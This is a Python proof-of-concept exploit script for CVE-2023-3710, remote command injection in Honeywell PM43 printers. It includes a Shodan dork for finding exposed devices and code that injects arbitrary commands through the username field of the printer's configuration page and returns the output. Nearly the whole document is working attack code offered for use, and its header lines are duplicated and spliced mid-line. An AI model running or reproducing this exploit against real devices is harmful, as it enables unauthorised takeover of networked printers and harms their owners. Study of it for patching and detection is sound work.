#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton. #- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
#- Shodan Dork: http.title:PM43 , PM43
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Frimware Version: versions prior to P10.19.050004
#- Tested on: P10.17.019667
#- CVE : CVE-2023-3710
import requests
import argparse
BLUE = '�33[94m'
YELLOW = '�33[93m'
RESET = '�33[0m'
def banner():
banner = """
╔════════════════════════════════════════════════╗
CVE-2023-3710
Command Injection in Honeywell PM43 Printers
Author: ByteHunter
╚════════════════════════════════════════════════╝
"""
print(YELLOW + banner + RESET)
def run_command(url, command):
full_url = f"{url}/loadfile.lp?pageid=Configure"
payload = {
'username': f'hunt {command} ',
'userpassword': 'admin12345admin!!'
}
try:
response = requests.post(full_url, data=payload, verify=False)
response_text = response.text
html_start_index = response_text.find('<html>')
if html_start_index != -1:
return response_text[:html_start_index]
else:
return response_text
except requests.exceptions.RequestException as e:
return f"Error: {e}"
def main():
parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
parser.add_argument('--url', dest='url', help='Target URL', required=True)
parser.add_argument('--run', dest='command', help='Command to execute', required=True)
args = parser.parse_args()
response = run_command(args.url, args.command)
print(f"{BLUE}{response}{RESET}")
if __name__ == "__main__":
banner()
main()